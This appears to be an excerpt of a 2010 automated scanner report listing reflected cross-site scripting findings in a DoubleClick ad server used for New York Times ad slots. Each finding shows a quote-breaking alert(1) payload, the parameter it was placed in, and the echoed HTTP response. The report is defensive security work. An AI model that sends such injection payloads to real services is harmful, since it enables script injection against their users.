Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d961"-alert(1)-"dd73ef3e141 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:25 GMT
Expires: Mon, 15 Nov 2010 07:24:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6110
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... cs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.22d961"-alert(1)-"dd73ef3e141&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallo ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d9ae"-alert(1)-"9a6023687c5 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:16 GMT
Expires: Mon, 15 Nov 2010 07:24:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; v ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d704d'-alert(1)-'065e3ddce1 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d4a8"-alert(1)-"bf65b757742 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:09 GMT
Expires: Mon, 15 Nov 2010 07:25:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6109
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae97'-alert(1)-'f24b1a0321 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:14 GMT
Expires: Mon, 15 Nov 2010 07:25:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321http://personalsavings.americanexpress.com/savings-product.html\"> ...[SNIP]...
4.52. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N553.newyorktimes.com/B4763885.2
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a188e"-alert(1)-"43fe46b40e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:18 GMT
Expires: Mon, 15 Nov 2010 07:25:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6122
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH ...[SNIP]...
4.53. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N553.newyorktimes.com/B4763885.2
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b4d'-alert(1)-'76af0dd89ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4522"-alert(1)-"26b2214d3e was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92149'-alert(1)-'093ff1d54f7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41333'-alert(1)-'81ced2474ac was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e466c"-alert(1)-"f5bbc38d216 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c3e'-alert(1)-'cdc68db4077 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 300ba"-alert(1)-"8f69fbdd3e9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:01 GMT
Expires: Mon, 15 Nov 2010 07:25:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a5ea"-alert(1)-"c7fe987232 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:34 GMT
Expires: Mon, 15 Nov 2010 07:24:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6114
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "nev ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c216'-alert(1)-'68576e4d92 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25dd'-alert(1)-'da387dc9d56 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce708"-alert(1)-"1dc8e459cae was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:43 GMT
Expires: Mon, 15 Nov 2010 07:24:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c41c8"-alert(1)-"ac3f17478db was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:52 GMT
Expires: Mon, 15 Nov 2010 07:24:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118
document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne ...[SNIP]... ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f06'-alert(1)-'d4d6ba4e70a was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea110'-alert(1)-'4a1a8ea4008 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a35e4"-alert(1)-"75f9009f3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1e6e"-alert(1)-"4b69fadcfd6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcal ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb391'-alert(1)-'9f92add2e4d was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5a0"-alert(1)-"672f1f4bd was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6420
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 983a0'-alert(1)-'9af9ccbb6b9 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5467f'-alert(1)-'9ed5241a6ce was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6cehttp://www.xc4.is\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a03"-alert(1)-"022abc0060 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6421
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH ...[SNIP]...
4.74. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N636.276948.NYTIMES/B4871537.31
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c453b'-alert(1)-'81b54708230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6440
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1http://www.xc4.is\"> ...[SNIP]...
4.75. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N636.276948.NYTIMES/B4871537.31
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ab1"-alert(1)-"63e4c9f6674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6440
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1http://www.xc4.is"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var win ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8210f'-alert(1)-'afe3257d6a1 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6426
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\"> ...[SNIP]...
